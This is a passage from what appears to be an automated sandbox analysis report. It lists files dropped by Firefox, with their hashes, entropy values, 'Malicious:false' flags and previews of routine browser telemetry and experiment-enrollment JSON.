                                                                                                                                                                                  Size (bytes):66
                                                                                                                                                                                  Entropy (8bit):4.837595020998689
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:3fX/xH8IXl/I3v0lb7iioW:vXpH1RPXt
                                                                                                                                                                                  MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                                                                                                                  SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                                                                                                                  SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                                                                                                                  SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):49357
                                                                                                                                                                                  Entropy (8bit):5.249999432032126
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:R2o01Yc6v0BhgeTjjOugcvmjYpvZMd0ruo8Yhy8NEdhLRRsNhnzFSJ2fE:R2o0O1MBtKqvBppjypLRRsNhnzFSJR
                                                                                                                                                                                  MD5:1E4CAB5732D9CCC96DDBF426AADA5E93
                                                                                                                                                                                  SHA1:34DD5B11189C2554C34B523A8FDE995395D7D53D
                                                                                                                                                                                  SHA-256:E93D3B85E4464623EC8B3FABB2E3DD189574CD55E99C8182397C673CB48841BC
                                                                                                                                                                                  SHA-512:3F98A5AC9AE408D162FA630B9CE6F550DD55A8502EEEA1A6DD557E756CB78DDC4959B05502484B0A274EFE8EBB481262840BB20801DBF8CF082E8E1ABEB45646
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"type":"main","id":"3a665447-7735-4a9a-b5dc-d9e07c147418","creationDate":"2024-02-21T12:44:56.280Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"ver":4,"simpleMeasurements":{"totalTime":8961,"start":4432125,"main":4432795,"selectProfile":4432827,"afterProfileLocked":4432831,"startupCrashDetectionBegin":4436088,"firstPaint":4440619,"firstPaint2":4440001,"sessionRestoreInit":4437160,"sessionRestored":4440972,"createTopLevelWindow":4436386,"AMI_startup_begin":8866858,"XPI_startup_begin":8866865,"XPI_bootstrap_addons_begin":8866871,"XPI_bootstrap_addons_end":8867029,"XPI_startup_end":8867029,"AMI_startup_end":8867029,"XPI_finalUIStartup":8867861,"sessionRestoreInitialized":8867863,"delayedStartupStarted":8871325,"delayedStartupFinished":8871551,"startupInterrupted":0,"debuggerAttached":0,"s
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Matlab v4 mat-file (little endian) g, rows 0, columns 1025
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):7033
                                                                                                                                                                                  Entropy (8bit):4.391557009961953
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OSSF9nbkW6sSELty0oP/PbHpO7laQCUrdiEVA7:O9vnbosSE5JoPbJCQ
                                                                                                                                                                                  MD5:4B22C5050E4E24ED7D39F30AB2EFBA75
                                                                                                                                                                                  SHA1:3D67FBA1674493BAA2AFC376C2442740A7F91C7F
                                                                                                                                                                                  SHA-256:9DCA59E072160A1658E53BE7D32759474B4F2E403443DFD9E662641EF7AF73F1
                                                                                                                                                                                  SHA-512:56DC6CED8E7D9AC1DD1E1EB8480C4CAF907D58FBD6C399236FDD351CE62344DC5CB29473F64FEA069AB1FDFFEBF4B55793E7165416E8E3FDFC7F42BE0A2C1E07
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.................ping.....................app....:.......#.......baseline#legacy.telemetry.client_id9........0...........$.......7340e351-fad3-4a0f-b554-971fbfafe8fb!.......events#legacy.telemetry.client_id9........0...........$.......7340e351-fad3-4a0f-b554-971fbfafe8fb........events#urlbar.pref_max_results.............................*.......events#urlbar.pref_suggest_data_collection......................'.......events#urlbar.pref_suggest_nonsponsored......................$.......events#urlbar.pref_suggest_sponsored......................#.......events#urlbar.pref_suggest_topsites..............................glean_client_info#app_build#............................20230927232528........glean_client_info#app_channel.............................release%.......glean_client_info#app_display_version.............................118.0.1........glean_client_info#architecture.............................x86_64........glean_client_info#build_date2........)...................1970-01-01T00:00:00+
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Matlab v4 mat-file (little endian) g, rows 0, columns 1025
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):7033
                                                                                                                                                                                  Entropy (8bit):4.391557009961953
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OSSF9nbkW6sSELty0oP/PbHpO7laQCUrdiEVA7:O9vnbosSE5JoPbJCQ
                                                                                                                                                                                  MD5:4B22C5050E4E24ED7D39F30AB2EFBA75
                                                                                                                                                                                  SHA1:3D67FBA1674493BAA2AFC376C2442740A7F91C7F
                                                                                                                                                                                  SHA-256:9DCA59E072160A1658E53BE7D32759474B4F2E403443DFD9E662641EF7AF73F1
                                                                                                                                                                                  SHA-512:56DC6CED8E7D9AC1DD1E1EB8480C4CAF907D58FBD6C399236FDD351CE62344DC5CB29473F64FEA069AB1FDFFEBF4B55793E7165416E8E3FDFC7F42BE0A2C1E07
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1154
                                                                                                                                                                                  Entropy (8bit):4.616858941809899
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:YSTM/8oDQKtD7mpDltqVdHbDuytD7mpDuytD710:YOWpUKcxoLbbcbA
                                                                                                                                                                                  MD5:9495AB4DEDB3ECB1D4DA2F8E317ECF3D
                                                                                                                                                                                  SHA1:6DBCDE8D079CFB3A81F37810E94EF198D9CCF61C
                                                                                                                                                                                  SHA-256:6F83A79AA93F00473E8AC861AFE8F6CB394FC767AFF3541662B7553E5D03D16C
                                                                                                                                                                                  SHA-512:A911D52E097DCFBC647413DD235BA668C49936DB52B46DDD9BE2EC61275E3571A572CDD272163B1AFF7EF04239ADF5D5B69C26F3E202BF93FE141FB34583E36E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"timestamp":61915,"category":"nimbus_events","name":"enrollment","extra":{"experiment_type":"rollout","experiment":"extensions-migration-in-import-wizard-116-rollout","enrollment_id":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9","branch":"control"}}.{"timestamp":64059,"category":"nimbus_events","name":"validation_failed","extra":{"feature":"accessibilityCache","experiment":"next-generation-accessibility-user-powering-screen-readers","reason":"invalid-feature"}}.{"timestamp":64060,"category":"nimbus_events","name":"validation_failed","extra":{"experiment":"next-generation-accessibility-user-powering-screen-readers-and-other-ats-copy","reason":"invalid-feature","feature":"accessibilityCache"}}.{"timestamp":91996,"category":"nimbus_events","name":"validation_failed","extra":{"feature":"accessibilityCache","experiment":"next-generation-accessibility-user-powering-screen-readers","reason":"invalid-feature"}}.{"timestamp":91996,"category":"nimbus_events","name":"validation_failed","extra":{"
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1228
                                                                                                                                                                                  Entropy (8bit):4.622002125502566
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:YSgDTM/8oDQKtD7mpDltqVdHbDuytD7mpDuytD710:Yj3WpUKcxoLbbcbA
                                                                                                                                                                                  MD5:39D2FEDDF57C1D5E789BB06A29A45B44
                                                                                                                                                                                  SHA1:949662CCC8DD30B13D01DD31C5167B98C6556EEB
                                                                                                                                                                                  SHA-256:F22F2C1A54BF85CD79A17613E7A22337F5FE2D2B64F779C9EA7A32A87A47604A
                                                                                                                                                                                  SHA-512:E6F97C9EC7DC235F2F58C18B4204BC6BCB1E452C30767DD3329F9E50DB1B8FCD3FEDBDD38F64514443D9D5D1CD1C3FBC42563B588CF80FD71E5AADCC9713C84E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"timestamp":0,"category":"fog.validation","name":"validate_early_event"}.{"timestamp":61915,"category":"nimbus_events","name":"enrollment","extra":{"experiment_type":"rollout","experiment":"extensions-migration-in-import-wizard-116-rollout","enrollment_id":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9","branch":"control"}}.{"timestamp":64059,"category":"nimbus_events","name":"validation_failed","extra":{"feature":"accessibilityCache","experiment":"next-generation-accessibility-user-powering-screen-readers","reason":"invalid-feature"}}.{"timestamp":64060,"category":"nimbus_events","name":"validation_failed","extra":{"experiment":"next-generation-accessibility-user-powering-screen-readers-and-other-ats-copy","reason":"invalid-feature","feature":"accessibilityCache"}}.{"timestamp":91996,"category":"nimbus_events","name":"validation_failed","extra":{"feature":"accessibilityCache","experiment":"next-generation-accessibility-user-powering-screen-readers","reason":"invalid-feature"}}.{"timesta
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (10690)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10761
                                                                                                                                                                                  Entropy (8bit):4.715630945657858
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:E4SfP+PCJDFujzXJzT9TA4xGBqhsRnjJxrf1Jps3Cm8M6IHc8Dofa5C8f+zHB9Q:x3abuuNqV+1+
                                                                                                                                                                                  MD5:20C8C5835D2706880EA3052F875F12EB
                                                                                                                                                                                  SHA1:BF7D0A6FF95907DA12300E42BDAA36E9F7D6052B
                                                                                                                                                                                  SHA-256:30D0FE6C4CED94AF1E11468147F874513DC30EFA5400706FF98FD27C42477CB5
                                                                                                                                                                                  SHA-512:AA77E10D59ACE55BF7AEF9BB5B227869FFEFDFC2D7FCD340B11A9599B7680AE8BB60454F1033F9F97D6B904886039018E6DAF2EC178D9F7896BFAD4539BD3A6A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/metrics/1/0662ae79-7d3e-4596-a16d-d1cef2261f61.{"ping_info":{"seq":0,"start_time":"2024-02-21T13:44+01:00","end_time":"2024-02-21T13:44+01:00","reason":"overdue","experiments":{"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7","type":"nimbus-rollout"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779","type":"nimbus-rollout"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","windows_build_number":19045,"client_id":"94e496bf-3c7e-4db9-9bf8-122f99be3ca5","architecture":"x86_64","locale":"en-US","app_channel":"release","os":"Windows","os_version":"10.0","app
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1538)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1618
                                                                                                                                                                                  Entropy (8bit):5.098004499022612
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:BvcHSaayhgWLu4K+U039jHaT+ZSb8+v7g:+Saayy49j6T+ZSb8+vk
                                                                                                                                                                                  MD5:CC201591F549ABC42CDD8B30157C3987
                                                                                                                                                                                  SHA1:AE6FE68D87ED8C58CAF9472ED0DE0AE6E2F7A97B
                                                                                                                                                                                  SHA-256:6651D9362F7E823398A7C39A7BEC7A41074EDAEA76546EE332199B12E0105014
                                                                                                                                                                                  SHA-512:0983E24D2CC5B8C6DCD082287BACC01B205CD844C7C0E4E8A1920A2664DCE09464B7613387F654C37C7572349679DDD012678C37F3741AA8A66AD6A147EDC2C7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/messaging-system/1/2143cd64-6046-46d9-bd1d-4fbd6e7367c1.{"ping_info":{"seq":12,"start_time":"2024-02-21T13:44+01:00","end_time":"2024-02-21T13:44+01:00","experiments":{"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}},"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26","type":"nimbus-rollout"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9","type":"nimbus-rollout"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","build_date":"1970-01-01T00:00:0
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1520)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1600
                                                                                                                                                                                  Entropy (8bit):5.0755229654427305
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:EcoWLu4hXOHvjuSarUk78E/7HaZcTSb8+C:44lOHvjuSaUEj6ZcTSb8+C
                                                                                                                                                                                  MD5:EA2A0EB3716522130FA06524EC7A4190
                                                                                                                                                                                  SHA1:A6F32B1A0FF41E8AFDBA6C5B48A84D98D3CB13F5
                                                                                                                                                                                  SHA-256:3E9583676DDB1A5E947E28C5642551914B9106A85DEC051D0B04F13D93355E52
                                                                                                                                                                                  SHA-512:834D2A93F27291AC0510352E0FCCE7D1364E6455B2CDA41C62A6E2F7B4513B66A6C63519017A0C91F71539FECE4B629CDD4238BF2EC2F76AA9CCCD8D2E1C9985
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/messaging-system/1/5e16a81f-1e89-4191-ac33-8ab19a08b66f.{"ping_info":{"seq":10,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","experiments":{"serp-ad-telemetry-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9","type":"nimbus-rollout"}},"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"type":"nimbus-nimbus","enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","windows_build_number":19045,"ap
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (872)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):942
                                                                                                                                                                                  Entropy (8bit):4.992246703524653
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:BGKg7U+8M4uyeAjjMokBpSwZL7GA++nAa:u7UtM4L/jKBpMAnN
                                                                                                                                                                                  MD5:0471E2BE915ED9BB5EFE7223B783BBD2
                                                                                                                                                                                  SHA1:0D2DEAD3BF0074CDF3F2B882C4CCDF73808FDCE6
                                                                                                                                                                                  SHA-256:152569A1855ADA473DCBA0A1215C3B771E083B6EB15F95DA8660C04EB025C3F0
                                                                                                                                                                                  SHA-512:A2B5D593589BAB6B5F218A0297068C07A2D307BF1D4EBCE109E19FDEDB814A8ADC9610FC121BA2E6F32FA1C28525B3DE6738BE2E486A46B18EE5ABF9CC3AA50B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/newtab/1/6f7581f3-9c81-406e-b1d2-b9090ab44db1.{"ping_info":{"seq":6,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","reason":"component_init"},"client_info":{"telemetry_sdk_build":"53.2.0","client_id":"94e496bf-3c7e-4db9-9bf8-122f99be3ca5","os":"Windows","os_version":"10.0","architecture":"x86_64","app_build":"20230927232528","app_channel":"release","app_display_version":"118.0.1","locale":"en-US","build_date":"1970-01-01T00:00:00+00:00","first_run_date":"2023-10-05+02:00","windows_build_number":19045},"metrics":{"boolean":{"newtab.search.enabled":true,"pocket.is_signed_in":false,"pocket.enabled":true,"topsites.enabled":true,"topsites.sponsored_enabled":true,"pocket.sponsored_stories_enabled":true},"string":{"newtab.homepage_category":"enabled","newtab.newtab_category":"enabled","newtab.locale":"en-US"},"string_list":{"newtab.blocked_sponsors":[]},"quantity":{"topsites.rows":1}}}
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1500)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1572
                                                                                                                                                                                  Entropy (8bit):5.026046602851725
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:BGc+U/RJgw+RhvXWLXJ5hJWSj+V+JZiXG8++udUojTAfMoNC8M4OBpBwovS2p8:1+AvOH/WLVYSaG8ZuUogLpM4OBpbK2p8
                                                                                                                                                                                  MD5:F3A37B82A5BFA9F3A132A68B62A02552
                                                                                                                                                                                  SHA1:22B377B1E6BE3E350457E5D179359716EAAD6B38
                                                                                                                                                                                  SHA-256:B9862D7A3719239780154AF7AE75161894C202FC70AC4EA534266D83C0B1CCAD
                                                                                                                                                                                  SHA-512:F8E7441E40B41D33B895CD9775E8FC8460C94CAC6EB82549FE4D3DBE9E332A5838F9138BD7AAEB37A78DAE48518E4F18921631D21C075F19E2CA7C3B9C27ACC6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/baseline/1/967d9d50-f397-49d3-8ec0-e15f2a105ac0.{"ping_info":{"seq":2,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","reason":"active","experiments":{"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779","type":"nimbus-rollout"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","app_build":"2023092723
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (2799)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2869
                                                                                                                                                                                  Entropy (8bit):4.919643562920363
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:Tc3BvOH/WLu4KJSarUkppM4sWjopq4cuSmdWLxQepU0pI:TcNOHz4CSalyajo7SndUV
                                                                                                                                                                                  MD5:0C161BC78025C39768D843B9C641ADE6
                                                                                                                                                                                  SHA1:B5A21CF91FF97CABB87E6692CC90E47E2FC7A0EC
                                                                                                                                                                                  SHA-256:C2F19EF60DB076FDB296E9E3C4D0FBEE9DE39FD83C860CE22F6E17A147578B95
                                                                                                                                                                                  SHA-512:3039A7926FE5F67A1DF0739CAD5B7B4521CC6F75AF130FEDD19AB032E161ED93259AD50814BAD557FD00570DAE64766225407BE4832BD212770DD1C0A433E7B8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/events/1/a7791896-2046-4b05-9685-73f32d9a99cc.{"ping_info":{"seq":1,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","reason":"startup","experiments":{"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","windows_build_number":19045,"first_run_date":"2023-10-05+02:00","build_date":"1970-01-01T00:00:00+00:00","client_id":"94e496bf-3c7e-4db9-9bf8-122f99be3ca5","architecture":"x86_64","loc
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1538)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1618
                                                                                                                                                                                  Entropy (8bit):5.09652312694415
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:FzvcoWLV9Z0uSaaOHrUP8/tFHa+jZmPb8v7qk:K30uSaaOHs8z6+jZib8v+k
                                                                                                                                                                                  MD5:4F5875201AE6367D24257D8567B9BD3F
                                                                                                                                                                                  SHA1:65BEABC6802767A5E969D7BF8287937BE44ED766
                                                                                                                                                                                  SHA-256:5B64C3F72BE2E4A081269D7B46AB272260392FA99806B4831BFBC5521C31BB2F
                                                                                                                                                                                  SHA-512:9C5359967836FA94384B9558C08362D3F3B354279F94CD8246E7E3266FD4DF5DEDD04CAD3D7C370CEA83B2D0C9845353DA9791CBC6D7AAD047A3E325A7A6C903
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/messaging-system/1/b21f31f8-fb59-4e8d-9fe8-b64d11a07cfa.{"ping_info":{"seq":11,"start_time":"2024-02-21T13:44+01:00","end_time":"2024-02-21T13:44+01:00","experiments":{"serp-ad-telemetry-rollout":{"branch":"control","extra":{"enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779","type":"nimbus-rollout"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"type":"nimbus-nimbus","enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}},"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","app_display_version":"118.0.1",
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (10690)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10761
                                                                                                                                                                                  Entropy (8bit):4.715630945657858
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:E4SfP+PCJDFujzXJzT9TA4xGBqhsRnjJxrf1Jps3Cm8M6IHc8Dofa5C8f+zHB9Q:x3abuuNqV+1+
                                                                                                                                                                                  MD5:20C8C5835D2706880EA3052F875F12EB
                                                                                                                                                                                  SHA1:BF7D0A6FF95907DA12300E42BDAA36E9F7D6052B
                                                                                                                                                                                  SHA-256:30D0FE6C4CED94AF1E11468147F874513DC30EFA5400706FF98FD27C42477CB5
                                                                                                                                                                                  SHA-512:AA77E10D59ACE55BF7AEF9BB5B227869FFEFDFC2D7FCD340B11A9599B7680AE8BB60454F1033F9F97D6B904886039018E6DAF2EC178D9F7896BFAD4539BD3A6A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/metrics/1/0662ae79-7d3e-4596-a16d-d1cef2261f61.{"ping_info":{"seq":0,"start_time":"2024-02-21T13:44+01:00","end_time":"2024-02-21T13:44+01:00","reason":"overdue","experiments":{"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7","type":"nimbus-rollout"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779","type":"nimbus-rollout"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","windows_build_number":19045,"client_id":"94e496bf-3c7e-4db9-9bf8-122f99be3ca5","architecture":"x86_64","locale":"en-US","app_channel":"release","os":"Windows","os_version":"10.0","app
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1538)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1618
                                                                                                                                                                                  Entropy (8bit):5.098004499022612
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:BvcHSaayhgWLu4K+U039jHaT+ZSb8+v7g:+Saayy49j6T+ZSb8+vk
                                                                                                                                                                                  MD5:CC201591F549ABC42CDD8B30157C3987
                                                                                                                                                                                  SHA1:AE6FE68D87ED8C58CAF9472ED0DE0AE6E2F7A97B
                                                                                                                                                                                  SHA-256:6651D9362F7E823398A7C39A7BEC7A41074EDAEA76546EE332199B12E0105014
                                                                                                                                                                                  SHA-512:0983E24D2CC5B8C6DCD082287BACC01B205CD844C7C0E4E8A1920A2664DCE09464B7613387F654C37C7572349679DDD012678C37F3741AA8A66AD6A147EDC2C7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/messaging-system/1/2143cd64-6046-46d9-bd1d-4fbd6e7367c1.{"ping_info":{"seq":12,"start_time":"2024-02-21T13:44+01:00","end_time":"2024-02-21T13:44+01:00","experiments":{"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}},"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26","type":"nimbus-rollout"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9","type":"nimbus-rollout"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","build_date":"1970-01-01T00:00:0
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1520)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1600
                                                                                                                                                                                  Entropy (8bit):5.0755229654427305
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:EcoWLu4hXOHvjuSarUk78E/7HaZcTSb8+C:44lOHvjuSaUEj6ZcTSb8+C
                                                                                                                                                                                  MD5:EA2A0EB3716522130FA06524EC7A4190
                                                                                                                                                                                  SHA1:A6F32B1A0FF41E8AFDBA6C5B48A84D98D3CB13F5
